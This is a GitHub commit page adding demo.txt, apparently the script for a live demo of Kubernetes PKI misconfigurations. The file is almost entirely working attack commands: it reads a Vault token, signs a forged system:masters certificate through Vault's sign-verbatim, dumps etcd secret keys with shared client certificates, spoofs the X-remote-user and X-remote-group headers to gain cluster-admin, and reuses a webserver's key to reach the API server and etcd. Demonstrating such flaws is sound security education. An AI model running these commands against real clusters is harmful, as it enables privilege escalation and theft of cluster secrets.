Skip to content

Commit f21e528

Browse files
tabbysabletabbysable
committed
Initial import
1 parent bd0772f commit f21e528

File tree

2 files changed

+529
-0
lines changed

2 files changed

+529
-0
lines changed

demo.txt

+86
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,86 @@
1+
#####
2+
# PKI access control
3+
4+
KUBECONFIG=k8s-client.kubeconfig kubectl exec -it webserver -- bash
5+
6+
cat /etc/nginx/sites-enabled/default
7+
8+
openssl x509 -noout -text -in /etc/ssl/certs/webserver.pem | grep -e "Subject:" -e "Issuer:"
9+
10+
cat /root/.vault-token
11+
12+
cat > pwn.cnf <<EOF
13+
[ req ]
14+
default_bits = 2048
15+
default_md = sha256
16+
prompt = no
17+
encrypt_key = no
18+
distinguished_name = dn
19+
[ dn ]
20+
O = system:masters
21+
CN = goose
22+
EOF
23+
24+
openssl req -new -config "pwn.cnf" -keyout "pwn.key" -out "pwn.csr"
25+
26+
json=$(VAULT_FORMAT=json vault write pki/k8s-pki/sign-verbatim csr=@"pwn.csr" ttl=24h)
27+
28+
echo "${json}" | jq -r '.["data"]["certificate"],.["data"]["ca_chain"][]' > "pwn.crt"
29+
30+
openssl x509 -noout -text -in pwn.crt | grep -e "Subject:" -e "Issuer:"
31+
32+
curl -s -k --cert pwn.crt --key pwn.key https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}/api/v1/namespaces/kube-system/secrets | jq '.["items"][]["metadata"]["name"]' | head -5
33+
34+
35+
#####
36+
#etcd Shared:
37+
38+
openssl x509 -noout -text -in k8s-client.crt | grep -e "Subject:" -e "Issuer:"
39+
40+
etcdctl --cacert=kubernetes/pki/ca.crt --cert=k8s-client.crt --key=k8s-client.key --endpoints=172.18.0.2:2379 --insecure-skip-tls-verify get --prefix=true "/registry/secrets/kube-system" --keys-only=true | head -5
41+
42+
curl -s -k --cert k8s-client.crt --key k8s-client.key https://172.18.0.2:2379/v3/kv/range -X POST -d "{\"key\": \"$(echo -n '/registry/secrets/kube-system' | base64)\", \"range_end\": \"$(echo -n '/registry/secrets/kube-systen' | base64)\"}" | jq '.["kvs"][]["key"] | @base64d' | head -5
43+
44+
alias ectl="etcdctl --cacert=kubernetes/pki/ca.crt --cert=kubernetes/pki/apiserver-etcd-client.crt --key=kubernetes/pki/apiserver-etcd-client.key --endpoints=172.18.0.2:2379 --insecure-skip-tls-verify"
45+
46+
ectl user add root --no-password=true
47+
ectl user grant-role root root
48+
ectl user add kube-apiserver-etcd-client --no-password=true
49+
ectl user grant-role kube-apiserver-etcd-client root
50+
ectl auth enable
51+
52+
etcdctl --cacert=kubernetes/pki/ca.crt --cert=k8s-client.crt --key=k8s-client.key --endpoints=172.18.0.2:2379 --insecure-skip-tls-verify get --prefix=true "/registry/secrets/kube-system" --keys-only=true
53+
54+
ectl auth disable
55+
56+
#####
57+
#requestheader-allowed-names:
58+
59+
PORT=`docker inspect kind-${KINDID}-control-plane | sed -n 's/^.*"HostPort": "\([0-9][0-9]*\)".*$/\1/p' | head -1`
60+
61+
curl -s -k --cert k8s-client.crt --key k8s-client.key https://127.0.0.1:${PORT}/api/v1/namespaces/kube-system/secrets
62+
63+
curl -s -k --cert k8s-client.crt --key k8s-client.key -H "X-remote-user: goose" -H "X-remote-group: system:masters" https://127.0.0.1:${PORT}/api/v1/namespaces/kube-system/secrets | jq '.["items"][]["metadata"]["name"]' | head -5
64+
65+
#####
66+
# improper chaining
67+
68+
# cross-cluster kubeconfig
69+
70+
cat k8s-client.kubeconfig | sed -n 's/^.*client-certificate-data: //p' | base64 -d | openssl x509 -noout -text | grep -e Subject: -e Issuer:
71+
72+
cat nonprod-k8s-admin.kubeconfig | sed -n 's/^.*client-certificate-data: //p' | base64 -d | openssl x509 -noout -text | grep -e Subject: -e Issuer:
73+
74+
KUBECONFIG=nonprod-k8s-admin.kubeconfig kubectl get secrets -n kube-system | head -5
75+
76+
# missing requestheader-allowed-names
77+
78+
KUBECONFIG=k8s-client.kubeconfig kubectl exec -it webserver -- bash
79+
80+
cat /etc/nginx/sites-enabled/default
81+
curl -s -k --cert /etc/ssl/certs/webserver.pem --key /etc/ssl/private/webserver.key https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}/api/v1/namespaces/kube-system/secrets
82+
83+
curl -s -k -H "X-remote-user: goose" -H "X-remote-group: system:masters" --cert /etc/ssl/certs/webserver.pem --key /etc/ssl/private/webserver.key https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}/api/v1/namespaces/kube-system/secrets | jq '.["items"][]["metadata"]["name"]' | head -5
84+
85+
# etcd
86+
curl -s -k --cert /etc/ssl/certs/webserver.pem --key /etc/ssl/private/webserver.key https://172.18.0.2:2379/v3/kv/range -X POST -d "{\"key\": \"$(echo -n '/registry/secrets/kube-system' | base64)\", \"range_end\": \"$(echo -n '/registry/secrets/kube-systen' | base64)\"}" | jq '.["kvs"][]["key"] | @base64d' | head -5

0 commit comments

Comments
 (0)